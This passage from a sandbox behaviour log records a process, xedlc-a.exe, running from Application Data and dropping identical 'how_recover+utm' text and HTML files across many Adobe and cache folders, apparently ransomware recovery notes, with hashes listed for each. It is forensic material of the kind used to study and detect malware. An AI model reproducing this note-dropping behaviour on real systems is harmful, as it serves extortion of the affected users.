60100.          value: C:\Documents and Settings\admin\IETldCache\how_recover+utm.html
60101.          processinfo:
60102.            pid: 1056
60103.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60104.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60105.            ads:
60106.          fid (ads:): 281474976778462
60107.          ntstatus: 0x0
60108.          CreateOptions: 0x60
60109.        file:
60110.          timestamp: 92197
60111.          mode: close
60112.          sequenceNumber: 1646
60113.          value: C:\Documents and Settings\admin\IETldCache\how_recover+utm.html
60114.          filesize: 9495
60115.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60116.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60117.          processinfo:
60118.            pid: 1056
60119.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60120.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60121.            ads:
60122.          fid (ads:): 281474976778462
60123.          ntstatus: 0x0
60124.          CreateOptions: 0x0
60125.        file:
60126.          timestamp: 92283
60127.          mode: created
60128.          sequenceNumber: 1647
60129.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\10.0\how_recover+utm.txt
60130.          processinfo:
60131.            pid: 1056
60132.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60133.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60134.            ads:
60135.          fid (ads:): 281474976778463
60136.          ntstatus: 0x0
60137.          CreateOptions: 0x60
60138.        file:
60139.          timestamp: 92289
60140.          mode: close
60141.          sequenceNumber: 1648
60142.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\10.0\how_recover+utm.txt
60143.          filesize: 2682
60144.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60145.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60146.          processinfo:
60147.            pid: 1056
60148.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60149.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60150.            ads:
60151.          fid (ads:): 281474976778463
60152.          ntstatus: 0x0
60153.          CreateOptions: 0x0
60154.        file:
60155.          timestamp: 92411
60156.          mode: created
60157.          sequenceNumber: 1649
60158.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\10.0\how_recover+utm.html
60159.          processinfo:
60160.            pid: 1056
60161.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60162.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60163.            ads:
60164.          fid (ads:): 281474976778464
60165.          ntstatus: 0x0
60166.          CreateOptions: 0x60
60167.        file:
60168.          timestamp: 92417
60169.          mode: close
60170.          sequenceNumber: 1650
60171.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\10.0\how_recover+utm.html
60172.          filesize: 9495
60173.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60174.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60175.          processinfo:
60176.            pid: 1056
60177.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60178.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60179.            ads:
60180.          fid (ads:): 281474976778464
60181.          ntstatus: 0x0
60182.          CreateOptions: 0x0
60183.        file:
60184.          timestamp: 92496
60185.          mode: created
60186.          sequenceNumber: 1651
60187.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\Cache\how_recover+utm.txt
60188.          processinfo:
60189.            pid: 1056
60190.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60191.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60192.            ads:
60193.          fid (ads:): 281474976778465
60194.          ntstatus: 0x0
60195.          CreateOptions: 0x60
60196.        file:
60197.          timestamp: 92502
60198.          mode: close
60199.          sequenceNumber: 1652
60200.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\Cache\how_recover+utm.txt
60201.          filesize: 2682
60202.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60203.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60204.          processinfo:
60205.            pid: 1056
60206.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60207.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60208.            ads:
60209.          fid (ads:): 281474976778465
60210.          ntstatus: 0x0
60211.          CreateOptions: 0x0
60212.        file:
60213.          timestamp: 92582
60214.          mode: created
60215.          sequenceNumber: 1653
60216.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\Cache\how_recover+utm.html
60217.          processinfo:
60218.            pid: 1056
60219.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60220.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60221.            ads:
60222.          fid (ads:): 281474976778466
60223.          ntstatus: 0x0
60224.          CreateOptions: 0x60
60225.        file:
60226.          timestamp: 92589
60227.          mode: close
60228.          sequenceNumber: 1654
60229.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\Cache\how_recover+utm.html
60230.          filesize: 9495
60231.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60232.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60233.          processinfo:
60234.            pid: 1056
60235.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60236.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60237.            ads:
60238.          fid (ads:): 281474976778466
60239.          ntstatus: 0x0
60240.          CreateOptions: 0x0
60241.        file:
60242.          timestamp: 92596
60243.          mode: created
60244.          sequenceNumber: 1655
60245.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\how_recover+utm.txt
60246.          processinfo:
60247.            pid: 1056
60248.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60249.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60250.            ads:
60251.          fid (ads:): 281474976778467
60252.          ntstatus: 0x0
60253.          CreateOptions: 0x60
60254.        file:
60255.          timestamp: 92602
60256.          mode: close
60257.          sequenceNumber: 1656
60258.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\how_recover+utm.txt
60259.          filesize: 2682
60260.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60261.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60262.          processinfo:
60263.            pid: 1056
60264.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60265.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60266.            ads:
60267.          fid (ads:): 281474976778467
60268.          ntstatus: 0x0
60269.          CreateOptions: 0x0
60270.        file:
60271.          timestamp: 92609
60272.          mode: created
60273.          sequenceNumber: 1657
60274.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\how_recover+utm.html
60275.          processinfo:
60276.            pid: 1056
60277.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60278.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60279.            ads:
60280.          fid (ads:): 281474976778468
60281.          ntstatus: 0x0
60282.          CreateOptions: 0x60
60283.        file:
60284.          timestamp: 92615
60285.          mode: close
60286.          sequenceNumber: 1658
60287.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\11.0\how_recover+utm.html
60288.          filesize: 9495
60289.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60290.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60291.          processinfo:
60292.            pid: 1056
60293.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60294.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60295.            ads:
60296.          fid (ads:): 281474976778468
60297.          ntstatus: 0x0
60298.          CreateOptions: 0x0
60299.        file:
60300.          timestamp: 92624
60301.          mode: created
60302.          sequenceNumber: 1659
60303.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\how_recover+utm.txt
60304.          processinfo:
60305.            pid: 1056
60306.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60307.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60308.            ads:
60309.          fid (ads:): 281474976778469
60310.          ntstatus: 0x0
60311.          CreateOptions: 0x60
60312.        file:
60313.          timestamp: 92632
60314.          mode: close
60315.          sequenceNumber: 1660
60316.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\how_recover+utm.txt
60317.          filesize: 2682
60318.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60319.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60320.          processinfo:
60321.            pid: 1056
60322.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60323.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60324.            ads:
60325.          fid (ads:): 281474976778469
60326.          ntstatus: 0x0
60327.          CreateOptions: 0x0
60328.        file:
60329.          timestamp: 92728
60330.          mode: created
60331.          sequenceNumber: 1661
60332.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\how_recover+utm.html
60333.          processinfo:
60334.            pid: 1056
60335.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60336.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60337.            ads:
60338.          fid (ads:): 281474976778470
60339.          ntstatus: 0x0
60340.          CreateOptions: 0x60
60341.        file:
60342.          timestamp: 92735
60343.          mode: close
60344.          sequenceNumber: 1662
60345.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\how_recover+utm.html
60346.          filesize: 9495
60347.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60348.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60349.          processinfo:
60350.            pid: 1056
60351.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60352.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60353.            ads:
60354.          fid (ads:): 281474976778470
60355.          ntstatus: 0x0
60356.          CreateOptions: 0x0
60357.        file:
60358.          timestamp: 92742
60359.          mode: created
60360.          sequenceNumber: 1663
60361.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\how_recover+utm.txt
60362.          processinfo:
60363.            pid: 1056
60364.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60365.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60366.            ads:
60367.          fid (ads:): 281474976778471
60368.          ntstatus: 0x0
60369.          CreateOptions: 0x60
60370.        file:
60371.          timestamp: 92748
60372.          mode: close
60373.          sequenceNumber: 1664
60374.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\how_recover+utm.txt
60375.          filesize: 2682
60376.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60377.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60378.          processinfo:
60379.            pid: 1056
60380.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60381.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60382.            ads:
60383.          fid (ads:): 281474976778471
60384.          ntstatus: 0x0
60385.          CreateOptions: 0x0
60386.        file:
60387.          timestamp: 92757
60388.          mode: created
60389.          sequenceNumber: 1665
60390.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\how_recover+utm.html
60391.          processinfo:
60392.            pid: 1056
60393.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60394.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60395.            ads:
60396.          fid (ads:): 281474976778472
60397.          ntstatus: 0x0
60398.          CreateOptions: 0x60
60399.        file:
60400.          timestamp: 92765
60401.          mode: close
60402.          sequenceNumber: 1666
60403.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\7.0\how_recover+utm.html
60404.          filesize: 9495
60405.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60406.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60407.          processinfo:
60408.            pid: 1056
60409.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60410.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60411.            ads:
60412.          fid (ads:): 281474976778472
60413.          ntstatus: 0x0
60414.          CreateOptions: 0x0
60415.        file:
60416.          timestamp: 92778
60417.          mode: created
60418.          sequenceNumber: 1667
60419.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\how_recover+utm.txt
60420.          processinfo:
60421.            pid: 1056
60422.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60423.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60424.            ads:
60425.          fid (ads:): 281474976778473
60426.          ntstatus: 0x0
60427.          CreateOptions: 0x60
60428.        file:
60429.          timestamp: 92786
60430.          mode: close
60431.          sequenceNumber: 1668
60432.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\how_recover+utm.txt
60433.          filesize: 2682
60434.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60435.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60436.          processinfo:
60437.            pid: 1056
60438.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60439.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60440.            ads:
60441.          fid (ads:): 281474976778473
60442.          ntstatus: 0x0
60443.          CreateOptions: 0x0
60444.        file:
60445.          timestamp: 92815
60446.          mode: created
60447.          sequenceNumber: 1669
60448.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\how_recover+utm.html
60449.          processinfo:
60450.            pid: 1056
60451.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60452.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60453.            ads:
60454.          fid (ads:): 281474976778474
60455.          ntstatus: 0x0
60456.          CreateOptions: 0x60
60457.        file:
60458.          timestamp: 92822
60459.          mode: close
60460.          sequenceNumber: 1670
60461.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\how_recover+utm.html
60462.          filesize: 9495
60463.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60464.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60465.          processinfo:
60466.            pid: 1056
60467.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60468.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60469.            ads:
60470.          fid (ads:): 281474976778474
60471.          ntstatus: 0x0
60472.          CreateOptions: 0x0
60473.        file:
60474.          timestamp: 92833
60475.          mode: created
60476.          sequenceNumber: 1671
60477.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\how_recover+utm.txt
60478.          processinfo:
60479.            pid: 1056
60480.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60481.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60482.            ads:
60483.          fid (ads:): 281474976778475
60484.          ntstatus: 0x0
60485.          CreateOptions: 0x60
60486.        file:
60487.          timestamp: 92841
60488.          mode: close
60489.          sequenceNumber: 1672
60490.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\how_recover+utm.txt
60491.          filesize: 2682
60492.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60493.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60494.          processinfo:
60495.            pid: 1056
60496.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60497.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60498.            ads:
60499.          fid (ads:): 281474976778475
60500.          ntstatus: 0x0
60501.          CreateOptions: 0x0
60502.        file:
60503.          timestamp: 92850
60504.          mode: created
60505.          sequenceNumber: 1673
60506.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\how_recover+utm.html
60507.          processinfo:
60508.            pid: 1056
60509.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60510.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60511.            ads:
60512.          fid (ads:): 281474976778476
60513.          ntstatus: 0x0
60514.          CreateOptions: 0x60
60515.        file:
60516.          timestamp: 92856
60517.          mode: close
60518.          sequenceNumber: 1674
60519.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\how_recover+utm.html
60520.          filesize: 9495
60521.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60522.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60523.          processinfo:
60524.            pid: 1056
60525.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60526.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60527.            ads:
60528.          fid (ads:): 281474976778476
60529.          ntstatus: 0x0
60530.          CreateOptions: 0x0
60531.        file:
60532.          timestamp: 92870
60533.          mode: created
60534.          sequenceNumber: 1675
60535.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\how_recover+utm.txt
60536.          processinfo:
60537.            pid: 1056
60538.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60539.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60540.            ads:
60541.          fid (ads:): 281474976778477
60542.          ntstatus: 0x0
60543.          CreateOptions: 0x60
60544.        file:
60545.          timestamp: 92876
60546.          mode: close
60547.          sequenceNumber: 1676
60548.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\how_recover+utm.txt
60549.          filesize: 2682
60550.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60551.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60552.          processinfo:
60553.            pid: 1056
60554.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60555.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60556.            ads:
60557.          fid (ads:): 281474976778477
60558.          ntstatus: 0x0
60559.          CreateOptions: 0x0
60560.        file:
60561.          timestamp: 92884
60562.          mode: created
60563.          sequenceNumber: 1677
60564.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\how_recover+utm.html
60565.          processinfo:
60566.            pid: 1056
60567.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60568.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60569.            ads:
60570.          fid (ads:): 281474976778478
60571.          ntstatus: 0x0
60572.          CreateOptions: 0x60
60573.        file:
60574.          timestamp: 92890
60575.          mode: close
60576.          sequenceNumber: 1678
60577.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\how_recover+utm.html
60578.          filesize: 9495
60579.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60580.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60581.          processinfo:
60582.            pid: 1056
60583.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60584.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60585.            ads:
60586.          fid (ads:): 281474976778478
60587.          ntstatus: 0x0
60588.          CreateOptions: 0x0
60589.        file:
60590.          timestamp: 92899
60591.          mode: created
60592.          sequenceNumber: 1679
60593.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\how_recover+utm.txt
60594.          processinfo:
60595.            pid: 1056
60596.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60597.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60598.            ads:
60599.          fid (ads:): 281474976778479
60600.          ntstatus: 0x0
60601.          CreateOptions: 0x60
60602.        file:
60603.          timestamp: 92905
60604.          mode: close
60605.          sequenceNumber: 1680
60606.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\how_recover+utm.txt
60607.          filesize: 2682
60608.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60609.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60610.          processinfo:
60611.            pid: 1056
60612.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60613.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60614.            ads:
60615.          fid (ads:): 281474976778479
60616.          ntstatus: 0x0
60617.          CreateOptions: 0x0
60618.        file:
60619.          timestamp: 92951
60620.          mode: created
60621.          sequenceNumber: 1681
60622.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\how_recover+utm.html
60623.          processinfo:
60624.            pid: 1056
60625.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60626.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60627.            ads:
60628.          fid (ads:): 281474976778480
60629.          ntstatus: 0x0
60630.          CreateOptions: 0x60
60631.        file:
60632.          timestamp: 92957
60633.          mode: close
60634.          sequenceNumber: 1682
60635.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\how_recover+utm.html
60636.          filesize: 9495
60637.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60638.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60639.          processinfo:
60640.            pid: 1056
60641.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60642.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60643.            ads:
60644.          fid (ads:): 281474976778480
60645.          ntstatus: 0x0
60646.          CreateOptions: 0x0
60647.        file:
60648.          timestamp: 92966
60649.          mode: created
60650.          sequenceNumber: 1683
60651.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\how_recover+utm.txt
60652.          processinfo:
60653.            pid: 1056
60654.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60655.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60656.            ads:
60657.          fid (ads:): 281474976778481
60658.          ntstatus: 0x0
60659.          CreateOptions: 0x60
60660.        file:
60661.          timestamp: 92973
60662.          mode: close
60663.          sequenceNumber: 1684
60664.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\how_recover+utm.txt
60665.          filesize: 2682
60666.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60667.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60668.          processinfo:
60669.            pid: 1056
60670.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60671.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60672.            ads:
60673.          fid (ads:): 281474976778481
60674.          ntstatus: 0x0
60675.          CreateOptions: 0x0
60676.        file:
60677.          timestamp: 92980
60678.          mode: created
60679.          sequenceNumber: 1685
60680.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\how_recover+utm.html
60681.          processinfo:
60682.            pid: 1056
60683.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60684.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60685.            ads:
60686.          fid (ads:): 281474976778482
60687.          ntstatus: 0x0
60688.          CreateOptions: 0x60
60689.        file:
60690.          timestamp: 92986
60691.          mode: close
60692.          sequenceNumber: 1686
60693.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\how_recover+utm.html
60694.          filesize: 9495
60695.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60696.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60697.          processinfo:
60698.            pid: 1056
60699.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60700.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60701.            ads:
60702.          fid (ads:): 281474976778482
60703.          ntstatus: 0x0
60704.          CreateOptions: 0x0
60705.        file:
60706.          timestamp: 92994
60707.          mode: created
60708.          sequenceNumber: 1687
60709.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\how_recover+utm.txt
60710.          processinfo:
60711.            pid: 1056
60712.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60713.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60714.            ads:
60715.          fid (ads:): 281474976778483
60716.          ntstatus: 0x0
60717.          CreateOptions: 0x60
60718.        file:
60719.          timestamp: 93000
60720.          mode: close
60721.          sequenceNumber: 1688
60722.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\how_recover+utm.txt
60723.          filesize: 2682
60724.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60725.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60726.          processinfo:
60727.            pid: 1056
60728.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60729.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60730.            ads:
60731.          fid (ads:): 281474976778483
60732.          ntstatus: 0x0
60733.          CreateOptions: 0x0
60734.        file:
60735.          timestamp: 93046
60736.          mode: created
60737.          sequenceNumber: 1689
60738.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\how_recover+utm.html
60739.          processinfo:
60740.            pid: 1056
60741.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60742.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60743.            ads:
60744.          fid (ads:): 281474976778484
60745.          ntstatus: 0x0
60746.          CreateOptions: 0x60
60747.        file:
60748.          timestamp: 93053
60749.          mode: close
60750.          sequenceNumber: 1690
60751.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\9.0\how_recover+utm.html
60752.          filesize: 9495
60753.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60754.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60755.          processinfo:
60756.            pid: 1056
60757.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60758.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60759.            ads:
60760.          fid (ads:): 281474976778484
60761.          ntstatus: 0x0
60762.          CreateOptions: 0x0
60763.        file:
60764.          timestamp: 93133
60765.          mode: created
60766.          sequenceNumber: 1691
60767.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\how_recover+utm.txt
60768.          processinfo:
60769.            pid: 1056
60770.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60771.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60772.            ads:
60773.          fid (ads:): 281474976778485
60774.          ntstatus: 0x0
60775.          CreateOptions: 0x60
60776.        file:
60777.          timestamp: 93139
60778.          mode: close
60779.          sequenceNumber: 1692
60780.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\how_recover+utm.txt
60781.          filesize: 2682
60782.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60783.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60784.          processinfo:
60785.            pid: 1056
60786.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60787.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60788.            ads:
60789.          fid (ads:): 281474976778485
60790.          ntstatus: 0x0
60791.          CreateOptions: 0x0
60792.        file:
60793.          timestamp: 93147
60794.          mode: created
60795.          sequenceNumber: 1693
60796.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\how_recover+utm.html
60797.          processinfo:
60798.            pid: 1056
60799.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60801.            ads:
60802.          fid (ads:): 281474976778486
60803.          ntstatus: 0x0
60804.          CreateOptions: 0x60
60805.        file:
60806.          timestamp: 93153
60807.          mode: close
60808.          sequenceNumber: 1694
60809.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\how_recover+utm.html
60810.          filesize: 9495
60811.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60812.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60813.          processinfo:
60814.            pid: 1056
60815.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60816.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60817.            ads:
60818.          fid (ads:): 281474976778486
60819.          ntstatus: 0x0
60820.          CreateOptions: 0x0
60821.        file:
60822.          timestamp: 93228
60823.          mode: created
60824.          sequenceNumber: 1695
60825.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\how_recover+utm.txt
60826.          processinfo:
60827.            pid: 1056
60828.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60829.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60830.            ads:
60831.          fid (ads:): 281474976778487
60832.          ntstatus: 0x0
60833.          CreateOptions: 0x60
60834.        file:
60835.          timestamp: 93234
60836.          mode: close
60837.          sequenceNumber: 1696
60838.          value: C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\how_recover+utm.txt
60839.          filesize: 2682
